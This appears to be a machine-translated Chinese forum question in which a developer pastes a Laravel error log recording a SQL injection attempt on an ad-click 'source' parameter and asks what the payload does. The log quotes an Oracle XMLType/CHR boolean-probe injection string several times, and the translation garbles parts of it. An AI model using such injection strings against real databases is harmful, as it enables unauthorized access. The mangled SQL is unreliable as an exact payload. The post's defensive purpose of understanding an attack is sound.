我在错误日志中醒来了
[2018-04-14 00:58:26] production.ERROR:SQLSTATE [22001]:字符串数据,右截断:1406数据太长,列'源'在第1行(SQL:插入
ad_clicks(ad_id,bout_id,source,updated_at,created_at)值(6,309031, app.home)AND 9957 =(选择UPPER(XMLType(CHR(60)|| CHR(58)|| CHR(113)|| CHR(113)|| CHR(112)|| CHR(122)|| CHR (113)||(SELECT(CASE WHEN(9957 = 9957)THEN 1 ELSE 0 END)FROM DUAL)|| CHR(113)|| CHR(107)|| CHR(118)|| CHR(107)|| CHR(113)|| CHR(62)))来自双人)和(9369 = 9369,2018-04-14 00:58:26,2018-04-14 00:58:26)){"例外& #34;:" [object](Illuminate \ Database \ QueryException(代码:22001):SQLSTATE [22001]:字符串数据,右截断:1406数据太长,列'源'在行1(SQL:插入ad_clicks(ad_id,bout_id,source,updated_at,created_at)值(6,309031,app。主页)AND 9957 =(选择UPPER(XMLType(CHR(60)|| CHR(58)|| CHR(113)|| CHR(113)|| CHR(112)|| CHR(122)|| CHR(113 )||(SELECT(CASE WHEN(9957 = 9957)THEN 1 ELSE 0 END)FROM DUAL)|| CHR(113)|| CHR(107)|| CHR(118)|| CHR(107)|| CHR( 113)|| CHR(62)))FROM DUAL)和(9369 = 9369,2018-04-14 00:58:26,2018-04-14 00:58:26))/ var / framework / vendor / laravel /框架/ src / Illuminate / Database / Connection.php:664,Doctrine \ DBAL \ Driver \ PDOException(代码:22001):SQLSTATE [22001]:字符串数据,右截断:1406数据太长,列'源'在第1行/var/framework/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/PDOStatement.php:107,PDOException(代码:22001):SQLSTATE [22001]:字符串数据,右截断:1406数据也是专栏'来源'在第1行
根据我的想法,有人尝试通过source参数注入此内容。
)AND 9957 =(选择UPPER(XMLType(CHR(60)|| CHR(58)|| CHR(113)|| CHR(113)|| CHR(112)|| CHR(122)|| CHR (113)||(SELECT(CASE WHEN(9957 = 9957)THEN 1 ELSE 0 END)FROM DUAL)|| CHR(113)|| CHR(107)|| CHR(118)|| CHR(107)|| CHR(113)|| CHR(62)))来自双)和(9369 = 9369
我基本上好奇攻击者或代码应该做什么。